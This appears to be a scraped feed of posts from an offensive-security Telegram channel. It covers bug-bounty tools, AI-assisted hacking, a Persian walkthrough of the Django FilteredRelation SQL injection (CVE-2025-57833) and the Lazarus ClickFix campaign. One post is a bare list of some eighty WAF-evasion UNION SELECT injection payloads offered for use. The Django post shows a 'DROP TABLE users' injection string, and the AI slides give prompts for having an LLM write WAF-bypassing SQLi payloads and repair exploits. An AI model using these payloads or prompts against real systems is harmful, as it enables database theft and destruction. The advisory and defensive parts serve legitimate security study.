Reflex is a powerful fuzzing tool for finding reflections, often leading to vulnerabilities like XSS. The latest update adds headless browser support. It scans a list of URLs, finds parameters, checks which ones are reflected, and with a custom wordlist you can boost the chance of discovering bugs.
Github-Repository: https://github.com/nexovir/reflix
#BugBounty #XSS #WebPentest #Hackerone
⭐️ @ZeroSec_team
Github-Repository: https://github.com/nexovir/reflix
#BugBounty #XSS #WebPentest #Hackerone
⭐️ @ZeroSec_team
GitHub
GitHub - nexovir/reflix: A smart fuzzing and parameter injection tool designed to discover reflections and identify potential XSS…
A smart fuzzing and parameter injection tool designed to discover reflections and identify potential XSS attack vectors. - nexovir/reflix
🔥6❤1
⚡Autoswagger is a command-line tool designed to discover, parse, and test for unauthenticated endpoints using Swagger/OpenAPI documentation. It helps identify potential security issues in unprotected endpoints of APIs, such as PII leaks and common secret exposures.
https://github.com/intruder-io/autoswagger
⭐️ @Zerosec_team
⭐️ @Zerosec_team
❤3👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 2 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 2 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
👍3❤1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
RadvanSec
Web LLM Attack Playbook: How I Scored $5K on a Public Program💸 PHASE #0 - Recon Understand where LLM is used (like chatbot , summarizer , assistant ,…) naturally before any attacks we need to get a big picture about LLM for THREAT MODELING PHASE #1 -…
I💥 AI Tools Hackers Are Using in 2025 (Red-Team & Blue-Team POV)
---
Slide 1 — Hook
AI isn’t just generating images anymore — it’s accelerating hacking.
From automated recon to payload crafting and even full pentest reporting, here’s how attackers (and defenders) are using AI in 2025 — with real examples & how to defend.
---
Slide 2 — WRAITH (AI-Powered Recon Automation)
What it does
Auto-discovers assets, subdomains, tech stack, open ports.
Prioritizes targets using LLM reasoning.
Generates recon → exploit hypotheses.
Example workflow
wraith --target example.com --out recon.json
# Feed recon.json to LLM:
“Suggest top 5 exploit paths from this recon. Rank by impact & ease.”
Why it’s scary: Recon that took hours now happens in minutes, with smarter prioritization.
---
Slide 3 — PentestGPT (LLM for Pentest Planning & Reporting)
Use-cases
Turn raw notes into a structured methodology (OWASP, PTES).
Suggest payloads per finding (SQLi, SSTI, XXE, etc.).
Generate executive + technical reports fast.
Example prompt
You are my senior pentester. Target: api.example.com
Stack: Node.js, GraphQL
Give me:
1) Attack surface checklist
2) High-probability vulns to test
3) Example payloads per vuln
4) Reporting template with risk ratings (CVSS)
---
Slide 4 — BurpGPT (Burp Suite + LLM Payload Brain)
What it does
Reads intercepted requests
Suggests custom payloads (WAF-aware, context-aware)
Helps craft polyglot, obfuscated, or blind-exploitation payloads
Example
Request:
POST /search {"q": "john"}
Prompt to BurpGPT:
“Generate 10 WAF-bypassing SQLi payloads for JSON body with parameter ‘q’. DB type unknown. Also give time-based blind variants.”
---
Slide 5 — X-Bow / Autonomous Pentest Engines
What they do
Chain recon → exploit → validate → write report
Can iterate on responses (e.g., WAF blocks)
Can run multi-step campaigns (dir brute force → SSRF → metadata steal → privilege escalation)
Example high-level flow (pseudo)
xbow --scope scope.txt
→ Asset discovery
→ LFI found → RCE candidate path suggested
→ Exploit validated
→ Draft report with PoC + risk score auto-generated
---
Slide 6 — ShellGPT / Terminal + AI = Lethal
Why it’s useful
Writes bash one-liners for recon, fuzzing, log triage
Summarizes verbose tool output (nmap, nuclei, logs)
Example prompt
I have a wordlist subdomains.txt and want to resolve only live subdomains to alive.txt using httpx. Write a one-liner and explain each flag.
Bonus: Ask it to “fix this exploit noscript that’s failing on Python 3.12” — instant debugging.
---
Slide 7 — AI-Driven Phishing & MFA Fatigue Campaigns (Defense POV)
Attackers use AI to
Clone writing styles from leaked emails
Auto-generate reverse proxy phishing kits (Evilginx2-like)
Craft localized, hyper-personalized lures
Automate MFA fatigue (“push bombing”) noscripts with social engineering noscripts
Defend with
FIDO2/WebAuthn (phish-resistant MFA)
Conditional access + impossible travel policies
User-behavior baselines + anomaly detection
---
Slide 8 — AI for Exploit Dev & Patch Diffing
Use-cases
Turn a PoC into a Metasploit module
Explain complex deserialization chains
Diff two versions of source code/binary and ask “What vuln was patched?”
Prompt example
Here’s a failing PoC for CVE-XXXX-YYYY. Fix it for Python 3.12, add argparse, and explain the root cause + exploitation path in comments.
---
Slide 9 — Blue-Team: How to Defend Against AI-Augmented Attackers
1. Phish-resistant MFA (FIDO2, hardware keys).
2. Attack surface monitoring — your own “Wraith” for blue team.
3. LLM-assisted log analysis (explain spikes, rare sequences, failed OAuth flows).
4. Prompt-hardened AI apps — sanitize model inputs, enforce allowlists.
5. Rate-limit & anomaly-detect AI-driven brute-force / fuzzing.
6. Automatic report diffing for repeated exploit vectors from bug bounty submissions.
---
Slide 10 — Ethics, Compliance & Reality
These tools can be weaponized.
Use only on assets you own or have written authorization for.
Always document consent, scope, and reporting responsibly.
⭐️ @ZeroSec_team
---
Slide 1 — Hook
AI isn’t just generating images anymore — it’s accelerating hacking.
From automated recon to payload crafting and even full pentest reporting, here’s how attackers (and defenders) are using AI in 2025 — with real examples & how to defend.
---
Slide 2 — WRAITH (AI-Powered Recon Automation)
What it does
Auto-discovers assets, subdomains, tech stack, open ports.
Prioritizes targets using LLM reasoning.
Generates recon → exploit hypotheses.
Example workflow
wraith --target example.com --out recon.json
# Feed recon.json to LLM:
“Suggest top 5 exploit paths from this recon. Rank by impact & ease.”
Why it’s scary: Recon that took hours now happens in minutes, with smarter prioritization.
---
Slide 3 — PentestGPT (LLM for Pentest Planning & Reporting)
Use-cases
Turn raw notes into a structured methodology (OWASP, PTES).
Suggest payloads per finding (SQLi, SSTI, XXE, etc.).
Generate executive + technical reports fast.
Example prompt
You are my senior pentester. Target: api.example.com
Stack: Node.js, GraphQL
Give me:
1) Attack surface checklist
2) High-probability vulns to test
3) Example payloads per vuln
4) Reporting template with risk ratings (CVSS)
---
Slide 4 — BurpGPT (Burp Suite + LLM Payload Brain)
What it does
Reads intercepted requests
Suggests custom payloads (WAF-aware, context-aware)
Helps craft polyglot, obfuscated, or blind-exploitation payloads
Example
Request:
POST /search {"q": "john"}
Prompt to BurpGPT:
“Generate 10 WAF-bypassing SQLi payloads for JSON body with parameter ‘q’. DB type unknown. Also give time-based blind variants.”
---
Slide 5 — X-Bow / Autonomous Pentest Engines
What they do
Chain recon → exploit → validate → write report
Can iterate on responses (e.g., WAF blocks)
Can run multi-step campaigns (dir brute force → SSRF → metadata steal → privilege escalation)
Example high-level flow (pseudo)
xbow --scope scope.txt
→ Asset discovery
→ LFI found → RCE candidate path suggested
→ Exploit validated
→ Draft report with PoC + risk score auto-generated
---
Slide 6 — ShellGPT / Terminal + AI = Lethal
Why it’s useful
Writes bash one-liners for recon, fuzzing, log triage
Summarizes verbose tool output (nmap, nuclei, logs)
Example prompt
I have a wordlist subdomains.txt and want to resolve only live subdomains to alive.txt using httpx. Write a one-liner and explain each flag.
Bonus: Ask it to “fix this exploit noscript that’s failing on Python 3.12” — instant debugging.
---
Slide 7 — AI-Driven Phishing & MFA Fatigue Campaigns (Defense POV)
Attackers use AI to
Clone writing styles from leaked emails
Auto-generate reverse proxy phishing kits (Evilginx2-like)
Craft localized, hyper-personalized lures
Automate MFA fatigue (“push bombing”) noscripts with social engineering noscripts
Defend with
FIDO2/WebAuthn (phish-resistant MFA)
Conditional access + impossible travel policies
User-behavior baselines + anomaly detection
---
Slide 8 — AI for Exploit Dev & Patch Diffing
Use-cases
Turn a PoC into a Metasploit module
Explain complex deserialization chains
Diff two versions of source code/binary and ask “What vuln was patched?”
Prompt example
Here’s a failing PoC for CVE-XXXX-YYYY. Fix it for Python 3.12, add argparse, and explain the root cause + exploitation path in comments.
---
Slide 9 — Blue-Team: How to Defend Against AI-Augmented Attackers
1. Phish-resistant MFA (FIDO2, hardware keys).
2. Attack surface monitoring — your own “Wraith” for blue team.
3. LLM-assisted log analysis (explain spikes, rare sequences, failed OAuth flows).
4. Prompt-hardened AI apps — sanitize model inputs, enforce allowlists.
5. Rate-limit & anomaly-detect AI-driven brute-force / fuzzing.
6. Automatic report diffing for repeated exploit vectors from bug bounty submissions.
---
Slide 10 — Ethics, Compliance & Reality
These tools can be weaponized.
Use only on assets you own or have written authorization for.
Always document consent, scope, and reporting responsibly.
⭐️ @ZeroSec_team
👍4❤1
🔴 آسیب پذیری از نوع SQL injection با شناسه ی CVE-2025-57833 در جنگو اصلاح شده که امتیاز 7.1 و شدت بالا داره.
نسخه های تحت تاثیر:
- Django main
- Django 5.2
- Django 5.1
- Django 4.2
نسخه های اصلاح شده: نسخه های 4.2.24, 5.1.12, 5.2.6 و بالاتر
آسیب پذیری در عملکرد FilteredRelation رخ میده و زمانی فعال میشه که به همراه expansionِ **kwargs در متدهای QuerySet.annotate یا QuerySet.alias استفاده بشه.
- تابع FilteredRelation یک قابلیت ORM در Django هست که امکان میده روی یک رابطه (مثل ForeignKey) شرط بزنیم. مثلا کد زیر فقط کامنتهای فعال هر پست میگیره:
- متد annotate برای اضافه کردن ستونهای محاسباتی (مثل count، sum) به کوئری استفاده میشه.
- متد alias دقیقاً مثل annotate هستش، ولی ستون جدید ایجاد نمیکنه، فقط یک اسم مستعار روی عبارت SQL میذاره.
مثلا در کد زیر num_comments یک alias برای COUNT(comments) میشه.
- در پایتون وقتی تابعی صدا زده میشه، میشه پارامترها رو مستقیم داد، یا اینکه از dict** استفاده کرد. در حالت مستقیم:
بصورت dict** :
در این حالت پایتون محتویات دیکشنری رو بشکل keyword argument باز میکنه یعنی معادل این میشه:
در جنگو هم اگه این داشته باشیم:
خروجی SQL:
در جنگو همیشه alias داخل "" قرار میگیره اما در FilteredRelation وقتی alias از طریق kwargs وارد میشه، alias بصورت خام میره داخل SQL. بنابراین اگه مهاجم این ورودی رو بده:
تبدیل میشه به :
و در نتیجه SQLinjection فعال میشه.
اینجا میتونید رایت آپ کامل و POC این آسیب پذیری رو بررسی کنید.
#جنگو #پایتون
#Django #SQLInjection #SQLi
⭐️ @ZeroSec_team
نسخه های تحت تاثیر:
- Django main
- Django 5.2
- Django 5.1
- Django 4.2
نسخه های اصلاح شده: نسخه های 4.2.24, 5.1.12, 5.2.6 و بالاتر
آسیب پذیری در عملکرد FilteredRelation رخ میده و زمانی فعال میشه که به همراه expansionِ **kwargs در متدهای QuerySet.annotate یا QuerySet.alias استفاده بشه.
- تابع FilteredRelation یک قابلیت ORM در Django هست که امکان میده روی یک رابطه (مثل ForeignKey) شرط بزنیم. مثلا کد زیر فقط کامنتهای فعال هر پست میگیره:
qs = Post.objects.annotate(
active_comments=FilteredRelation("comments", condition=Q(comments__is_active=True))
)
- متد annotate برای اضافه کردن ستونهای محاسباتی (مثل count، sum) به کوئری استفاده میشه.
- متد alias دقیقاً مثل annotate هستش، ولی ستون جدید ایجاد نمیکنه، فقط یک اسم مستعار روی عبارت SQL میذاره.
مثلا در کد زیر num_comments یک alias برای COUNT(comments) میشه.
qs = Post.objects.annotate(num_comments=Count("comments"))
- در پایتون وقتی تابعی صدا زده میشه، میشه پارامترها رو مستقیم داد، یا اینکه از dict** استفاده کرد. در حالت مستقیم:
greet(name="onhexgroup", age=25)
بصورت dict** :
info = {"name": "onhexgroup", "age": 25}
greet(**info)
در این حالت پایتون محتویات دیکشنری رو بشکل keyword argument باز میکنه یعنی معادل این میشه:
greet(name="onhexgroup", age=25)
در جنگو هم اگه این داشته باشیم:
user_alias = "custom_label" # ورودی کاربر
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))
خروجی SQL:
SELECT "myapp_order"."id",
"myapp_payment"."amount" AS "custom_label"
FROM "myapp_order"
LEFT OUTER JOIN "myapp_payment"
ON ("myapp_order"."id" = "myapp_payment"."order_id");
در جنگو همیشه alias داخل "" قرار میگیره اما در FilteredRelation وقتی alias از طریق kwargs وارد میشه، alias بصورت خام میره داخل SQL. بنابراین اگه مهاجم این ورودی رو بده:
user_alias = 'custom_label"; DROP TABLE users; --'
qs = Order.objects.annotate(**{user_alias: F("payment__amount")})
print(str(qs.query))
تبدیل میشه به :
sql
SELECT "myapp_order"."id",
"myapp_payment"."amount" AS custom_label"; DROP TABLE users; --
FROM "myapp_order"
و در نتیجه SQLinjection فعال میشه.
اینجا میتونید رایت آپ کامل و POC این آسیب پذیری رو بررسی کنید.
#جنگو #پایتون
#Django #SQLInjection #SQLi
⭐️ @ZeroSec_team
Django Project
Django security releases issued: 5.2.6, 5.1.12, and 4.2.24
Posted by Sarah Boyce on Sept. 3, 2025
❤8
Share your experience about WEB LLM ATTACKS with us via the channel's direct message.
❤2🔥2
Jason Haddix’s Article about HACKBOTS
https://executiveoffense.beehiiv.com/p/ai-hackbots-part-1
⭐️ @ZeroSec_team
https://executiveoffense.beehiiv.com/p/ai-hackbots-part-1
⭐️ @ZeroSec_team
Executive Offense
🔴 Executive Offense - Building AI Hackbots, Part 1
🔥4❤1
Bypass SQL union select
#Bypass #SQL
⭐️ @ZeroSec_team
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
⭐️ @ZeroSec_team
🔥2❤1👍1👎1
Defender for Identity
(formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network
⭐️ @ZeroSec_team
(formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network
⭐️ @ZeroSec_team
❤4
RadvanSec
Defender for Identity (formerly known as Azure Advanced Threat Protection or AATP) is a Microsoft cloud security service that focuses on Active Directory (AD) and Azure AD. Its main purpose is to detect threats, attacks, and lateral movements within the network…
Microsoft Defender for Identity in Depth.pdf
51.2 MB
❤3
🚨 XSS in Google IDX Workstation → RCE! $22,500 Bounty Earned 💰
Author: Aditya Sunny
Follow on LinkedIn: @adityasunny06
Program: Google VRP
Status: Accepted & Fixed ✅
Reward: $22,500 💸
https://infosecwriteups.com/xss-in-google-idx-workstation-rce-22-500-bounty-earned-2d09f0176869?gi=c80bc4672c8b
⭐️ @ZeroSec_team
Author: Aditya Sunny
Follow on LinkedIn: @adityasunny06
Program: Google VRP
Status: Accepted & Fixed ✅
Reward: $22,500 💸
https://infosecwriteups.com/xss-in-google-idx-workstation-rce-22-500-bounty-earned-2d09f0176869?gi=c80bc4672c8b
⭐️ @ZeroSec_team
Medium
🚨 XSS in Google IDX Workstation → RCE! $22,500 Bounty Earned 💰
Author: Aditya Sunny Follow on LinkedIn: @adityasunny06 Program: Google VRP Status: Accepted & Fixed ✅ Reward: $22,500 💸
🔥4❤1
From Blind XSS to RCE: When Headers Became My Terminal
https://is4curity.medium.com/from-blind-xss-to-rce-when-headers-became-my-terminal-d137d2c808a3
⭐️ @Zerosec_team
https://is4curity.medium.com/from-blind-xss-to-rce-when-headers-became-my-terminal-d137d2c808a3
⭐️ @Zerosec_team
🔥3❤2👏1
Forwarded from Hacking Articles
🚀 AI Penetration Training (Online) – Register Now! 🚀
🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1
📧 Email: info@ignitetechnologies.in
Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.
🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
🔗 Register here: https://forms.gle/bowpX9TGEs41GDG99
💬 WhatsApp: https://wa.me/message/HIOPPNENLOX6F1
📧 Email: info@ignitetechnologies.in
Limited slots available! Hurry up to secure your spot in this exclusive training program offered by Ignite Technologies.
🧠 LLM Architecture
🔐 LLM Security Principles
🗄 Data Security in AI Systems
🛡 Model Security
🏗 Infrastructure Security
📜 OWASP Top 10 for LLMs
⚙️ LLM Installation and Deployment
📡 Model Context Protocol (MCP)
🚀 Publishing Your Model Using Ollama
🔍 Introduction to Retrieval-Augmented Generation (RAG)
🌐 Making Your AI Application Public
📊 Types of Enumeration Using AI
🎯 Prompt Injection Attacks
🐞 Exploiting LLM APIs: Real-World Bug Scenarios
🔑 Password Leakage via AI Models
🎭 Indirect Prompt Injection Techniques
⚠️ Misconfigurations in LLM Deployments
👑 Exploitation of LLM APIs with Excessive Privileges
📝 Content Manipulation in LLM Outputs
📤 Data Extraction Attacks on LLMs
🔒 Securing AI Systems
🧾 System Prompts and Their Security Implications
🤖 Automated Penetration Testing with AI
❤6👍1
The Lazarus Group (APT), which is widely known to be linked to North Korea, has recently launched a new social engineering technique called ClickFix. In this method, the attacker fabricates a fake problem (for example, claiming that your camera is broken or that you need to install an update) and tricks the victim into clicking a link or executing a command that actually runs malicious code. Lazarus has been primarily using this technique in fake job interview scenarios within the cryptocurrency sector, which is why their new campaign is known as ClickFake Interview.
In these attacks, they typically drop infected files such as ClickFix-1.bat or compressed packages like nvidiaRelease.zip in front of the victim. These files execute malware families such as BeaverTail and InvisibleFerret, designed to steal information and establish hidden access. Interestingly, Lazarus has built multiple variants of these malware strains — ranging from PowerShell and Node.js noscripts on Windows to Golang binaries that run across Windows, Linux, and even macOS (both ARM and Intel).
⭐️ @ZeroSec_team
In these attacks, they typically drop infected files such as ClickFix-1.bat or compressed packages like nvidiaRelease.zip in front of the victim. These files execute malware families such as BeaverTail and InvisibleFerret, designed to steal information and establish hidden access. Interestingly, Lazarus has built multiple variants of these malware strains — ranging from PowerShell and Node.js noscripts on Windows to Golang binaries that run across Windows, Linux, and even macOS (both ARM and Intel).
⭐️ @ZeroSec_team
❤1👌1